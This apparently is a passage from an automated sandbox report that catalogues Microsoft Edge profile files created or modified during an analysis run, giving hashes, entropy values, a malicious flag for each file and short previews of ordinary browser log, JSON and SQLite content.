                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):328
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.0864392825879055
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6:HKfVq2PN723oH+Tcwt8NIFUt8YKnSgZmw+YKnSIkwON723oH+Tcwt8+eLJ:IvVaYebpFUt89X/+9F5OaYebqJ
                                                                                                                                                                                                                                                                                              MD5:554E32722EEBA564656D38A940CE05DF
                                                                                                                                                                                                                                                                                              SHA1:3C6E3AA9DB17EF382CF26479D383D219FA64C828
                                                                                                                                                                                                                                                                                              SHA-256:A7108FD398D3EDCCBD7D4012D6ABC422CB977E68029280A45BFFB1690B42E89B
                                                                                                                                                                                                                                                                                              SHA-512:80879057641442EC1734619A4D72BD1F8FDB2A25EFDCDBE9F5E35CB22CD2C974A906EC339427EFF4B91203AC611B9195A3377920A7540C1E3316ABCDD54E3821
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:2024/11/28-01:22:25.014 14c4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2024/11/28-01:22:25.015 14c4 Recovering log #3.2024/11/28-01:22:25.015 14c4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:modified
                                                                                                                                                                                                                                                                                              Size (bytes):270336
                                                                                                                                                                                                                                                                                              Entropy (8bit):0.0018062632662178783
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:MsEllllkEthXllkl2zEZlS1FT:/M/xT02zF1V
                                                                                                                                                                                                                                                                                              MD5:991E70F845F3780418412CFCA85812A0
                                                                                                                                                                                                                                                                                              SHA1:DA09FF745EF62A49E1344245694208F27A9A64C7
                                                                                                                                                                                                                                                                                              SHA-256:C81BDF7309EC4828CAF0E6E3017E1DB0BD91B02309F4A630E37B322A315656D5
                                                                                                                                                                                                                                                                                              SHA-512:0CCB5AD20E9A97A32EF6B7F57B710346DAEBFA33D1763FCB50B51C01F9CC28CC8702C33E95D80178BBD22649AA67CC1DD675095CCDFD0272E59EB5F0D49E9DAF
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):412
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.261299399911264
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12:EM+vVaYeb8rcHEZrELFUt8z+m/+z+iV5OaYeb8rcHEZrEZSJ:EdVaYeb8nZrExg8z+r+EOaYeb8nZrEZe
                                                                                                                                                                                                                                                                                              MD5:FE9DA854FF74D89BA3371F14DD9EE540
                                                                                                                                                                                                                                                                                              SHA1:B847901A3A39B633B4997BC19BE643FB7E608904
                                                                                                                                                                                                                                                                                              SHA-256:28F3230C86E6F0B1888A9B3E3156A4F7E966F408ED59C0836DAE0C5ED7DFD2D3
                                                                                                                                                                                                                                                                                              SHA-512:9B9A209C0F133C345285092437012A84744E6803EDC18512EEFAB56C35A0510C85F66DD672E700D09134FA7458865AED9589F1B9034063AC45DFC864A1336847
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:2024/11/28-01:22:27.953 14dc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2024/11/28-01:22:27.954 14dc Recovering log #3.2024/11/28-01:22:27.954 14dc Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):412
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.261299399911264
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12:EM+vVaYeb8rcHEZrELFUt8z+m/+z+iV5OaYeb8rcHEZrEZSJ:EdVaYeb8nZrExg8z+r+EOaYeb8nZrEZe
                                                                                                                                                                                                                                                                                              MD5:FE9DA854FF74D89BA3371F14DD9EE540
                                                                                                                                                                                                                                                                                              SHA1:B847901A3A39B633B4997BC19BE643FB7E608904
                                                                                                                                                                                                                                                                                              SHA-256:28F3230C86E6F0B1888A9B3E3156A4F7E966F408ED59C0836DAE0C5ED7DFD2D3
                                                                                                                                                                                                                                                                                              SHA-512:9B9A209C0F133C345285092437012A84744E6803EDC18512EEFAB56C35A0510C85F66DD672E700D09134FA7458865AED9589F1B9034063AC45DFC864A1336847
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:2024/11/28-01:22:27.953 14dc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2024/11/28-01:22:27.954 14dc Recovering log #3.2024/11/28-01:22:27.954 14dc Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):340
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.102121829089615
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6:HKFlD+q2PN723oH+Tcwt8a2jMGIFUt8YKWLaV5Zmw+YKWKtVkwON723oH+Tcwt8N:kavVaYeb8EFUt8oLaH/+oKT5OaYeb8bJ
                                                                                                                                                                                                                                                                                              MD5:F40D99ACB0F575F078040FB027542891
                                                                                                                                                                                                                                                                                              SHA1:54797DF52F0E519B4DA139DB15CEBA1E4F1970B9
                                                                                                                                                                                                                                                                                              SHA-256:D51AFBDBFAA5E1D87DC3DAEA27057A073868E92FAB7B8F2E19D8C49EA5C01716
                                                                                                                                                                                                                                                                                              SHA-512:F20DC9770FC3807BAF3D9D5B4E8842615DFA891C92D9FD780095C6971A37D344AA23A3C8E65FA2CC93A269A0F182D060BFE4B064DFEC0697381141948B645316
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:2024/11/28-01:22:25.201 1f08 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2024/11/28-01:22:25.315 1f08 Recovering log #3.2024/11/28-01:22:25.333 1f08 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):340
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.102121829089615
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6:HKFlD+q2PN723oH+Tcwt8a2jMGIFUt8YKWLaV5Zmw+YKWKtVkwON723oH+Tcwt8N:kavVaYeb8EFUt8oLaH/+oKT5OaYeb8bJ
                                                                                                                                                                                                                                                                                              MD5:F40D99ACB0F575F078040FB027542891
                                                                                                                                                                                                                                                                                              SHA1:54797DF52F0E519B4DA139DB15CEBA1E4F1970B9
                                                                                                                                                                                                                                                                                              SHA-256:D51AFBDBFAA5E1D87DC3DAEA27057A073868E92FAB7B8F2E19D8C49EA5C01716
                                                                                                                                                                                                                                                                                              SHA-512:F20DC9770FC3807BAF3D9D5B4E8842615DFA891C92D9FD780095C6971A37D344AA23A3C8E65FA2CC93A269A0F182D060BFE4B064DFEC0697381141948B645316
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:2024/11/28-01:22:25.201 1f08 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2024/11/28-01:22:25.315 1f08 Recovering log #3.2024/11/28-01:22:25.333 1f08 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):2
                                                                                                                                                                                                                                                                                              Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                              MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                              SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                              SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                              SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:[]
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):2
                                                                                                                                                                                                                                                                                              Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                              MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                              SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                              SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                              SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:[]
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 8, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):20480
                                                                                                                                                                                                                                                                                              Entropy (8bit):1.3502501341218744
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:48:TsKLopF+SawLUO1Xj8BWkUKbeTwX1Sd/NV/gJhoxvFX08:te+AuayeTwX1YL/ghWX08
                                                                                                                                                                                                                                                                                              MD5:7027C944D876034198CCDD7B91359AD1
                                                                                                                                                                                                                                                                                              SHA1:CD1B0DB2B026C84511E595B989BD709FFC7E32D2
                                                                                                                                                                                                                                                                                              SHA-256:9DE341A3D3E0C1C3E89C632D40FA07E7C53316E0CC56A473445813FCA7776BF3
                                                                                                                                                                                                                                                                                              SHA-512:310C7A5551BD0A4D2B6ECEFAB0817C247F72C4D0453C3FCF2C54E4DF0E365AC5051E621896EED8CF73093E6453E28CE712B05CFB50835E3C5AF92DC9F7E54C3A
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1484
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.3012315333051205
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:YcCp/WwFGJ/I3RdsrXZVMdmw6maPsw6C1VdsSyZFRudFGRRdsFZXpZC52HGQYhbj:YcCpfgCzslukBRs/fcKsFZPCgHnYhbj
                                                                                                                                                                                                                                                                                              MD5:1905172B384CBA631FA0F92616C3B618
                                                                                                                                                                                                                                                                                              SHA1:C49B2C1A4660BA4596CD09A010FD6B240D1ADCB3
                                                                                                                                                                                                                                                                                              SHA-256:BD5E1C904336FD948584109C3FA292879C8FCB281F5E3592D01B34F3E3EFCD47
                                                                                                                                                                                                                                                                                              SHA-512:83404C29E9D304D90239DA610F99F36C7DCEC7FE7A53CBC1F32AC2F596DA888765D735F225E6A47DFBF92E9A80E0350EA9640BE6AFF7E3E639B571950BF17457
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{"net":{"http_server_properties":{"servers":[{"anonymization":["FAAAAA4AAABodHRwOi8vbXNuLmNvbQAA",false],"server":"https://assets.msn.com","supports_spdy":true},{"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server":"https://www.googleapis.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13379840548385133","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"anonymization":["HAAAABUAAABodHRwczovL21pY3Jvc29mdC5jb20AAAA=",false],"server":"https://edge.microsoft.com","supports_spdy":true},{"anonymization":["HAAAABUAAABodHRwczovL2F6dXJlZWRnZS5uZXQAAAA=",false],"server":"https://edgeassetservice.azureedge.net","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13379840553129016","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW5
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 9, cookie 0x4, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                                                                                                                                                              Category:modified
                                                                                                                                                                                                                                                                                              Size (bytes):36864
                                                                                                                                                                                                                                                                                              Entropy (8bit):1.278900412411942
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:48:TaIopKWurJNVr1GJmA8pv82pfurJNVrdHXuccaurJN2VrJ1n4n1GmzNGU1cSBmvj:uIEumQv8m1ccnvS6mvbYiiX51a
                                                                                                                                                                                                                                                                                              MD5:C490F9EBBC9A28CA9B6E91104B0EF9A6
                                                                                                                                                                                                                                                                                              SHA1:3DDAE3B469B181C7458C1602C0908D52A62B5FE9
                                                                                                                                                                                                                                                                                              SHA-256:DB75BAE3EEC7230A6D23565BCE045036D4A57681922702583D71086E990CF5AE
                                                                                                                                                                                                                                                                                              SHA-512:AEAAC9F03EFE97EDBC7BE8A490F5C52155261BEEDACA794FA62C39579BB763D4E77E1EA528EBE749CA8249A81CD45DFE935731C58BC60180F0B5310A1A533A68
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................j..........g...D.........7............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):2
                                                                                                                                                                                                                                                                                              Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                              MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                              SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                              SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                              SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:[]
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):2
                                                                                                                                                                                                                                                                                              Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                              MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                              SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                              SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                              SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:[]
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):2
                                                                                                                                                                                                                                                                                              Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                              MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                              SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                              SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                              SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:[]
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):40
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                              MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                              SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                              SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                              SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{"SDCH":{"dictionaries":{},"version":2}}
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):40
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                              MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                              SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                              SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                              SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{"SDCH":{"dictionaries":{},"version":2}}
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):2
                                                                                                                                                                                                                                                                                              Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                              MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                              SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                              SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                              SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:[]
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1484
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.3012315333051205
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:YcCp/WwFGJ/I3RdsrXZVMdmw6maPsw6C1VdsSyZFRudFGRRdsFZXpZC52HGQYhbj:YcCpfgCzslukBRs/fcKsFZPCgHnYhbj
                                                                                                                                                                                                                                                                                              MD5:1905172B384CBA631FA0F92616C3B618
                                                                                                                                                                                                                                                                                              SHA1:C49B2C1A4660BA4596CD09A010FD6B240D1ADCB3
                                                                                                                                                                                                                                                                                              SHA-256:BD5E1C904336FD948584109C3FA292879C8FCB281F5E3592D01B34F3E3EFCD47
                                                                                                                                                                                                                                                                                              SHA-512:83404C29E9D304D90239DA610F99F36C7DCEC7FE7A53CBC1F32AC2F596DA888765D735F225E6A47DFBF92E9A80E0350EA9640BE6AFF7E3E639B571950BF17457
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{"net":{"http_server_properties":{"servers":[{"anonymization":["FAAAAA4AAABodHRwOi8vbXNuLmNvbQAA",false],"server":"https://assets.msn.com","supports_spdy":true},{"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server":"https://www.googleapis.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13379840548385133","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"anonymization":["HAAAABUAAABodHRwczovL21pY3Jvc29mdC5jb20AAAA=",false],"server":"https://edge.microsoft.com","supports_spdy":true},{"anonymization":["HAAAABUAAABodHRwczovL2F6dXJlZWRnZS5uZXQAAAA=",false],"server":"https://edgeassetservice.azureedge.net","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13379840553129016","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW5
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):20480
                                                                                                                                                                                                                                                                                              Entropy (8bit):0.7429706785845666
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12:TLSnAFUxOUDaabZXiDiIF8izX4fhhdWeci2oesJaYi3isPnSdvd0dn3ldjt9d6XF:TLSOUOq0afDdWec9sJQ3tOXI7J5fc
                                                                                                                                                                                                                                                                                              MD5:E837EA6D04D8BF6E6EB3DE44A0D55B3B
                                                                                                                                                                                                                                                                                              SHA1:4B9760FAE3A4790477529EA827DFBAF077B626A6
                                                                                                                                                                                                                                                                                              SHA-256:9AA122EA750652A4771847ED1329C17F416979053EDA385A99EC10C90AE04EB5
                                                                                                                                                                                                                                                                                              SHA-512:1BFDF7E6574A2DA534265F8B6D8641CBC5E841FF445825E7E1634B70D40EC2D62016CBD34A0C739CD2F630A6587EA01B28CA9DA9534C9AD81E9B32CC49019AA5
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):9767
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.111866745329898
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:192:stykdwJsF+paFvrE9kbMpH8DbV+FyHQArpUc+PdYJ:stypsFKCDBbG+Q3cl
                                                                                                                                                                                                                                                                                              MD5:8B5540DD2E56E5AD20A9F7BBA2654A67
                                                                                                                                                                                                                                                                                              SHA1:0EBED21CD567C43546865B3ECF5EEA7FC9A8833F
                                                                                                                                                                                                                                                                                              SHA-256:EC15383E1FF48ED3051D4256292136310E8A79A246E7D936B98CC2E44A8DEBEE
                                                                                                                                                                                                                                                                                              SHA-512:4A3A89A4BF64368EF6594EA15DDCC005DCED13B1CB829562C5846512E3509C5A653D4493C8F436E56E9CB70C733906DCF30EEF004623E029CC2B22AD04284AB1
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13377248544811538","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340961151815957","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":-1436,"left":-2400,"maximized":false,"right":-1350,"top":-2400,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":853,"browser_content_container_width":1006,"browser_content_container_x":0,"browser_content_container_y":111,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1,"datatype_details_migration_performed"
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):9767
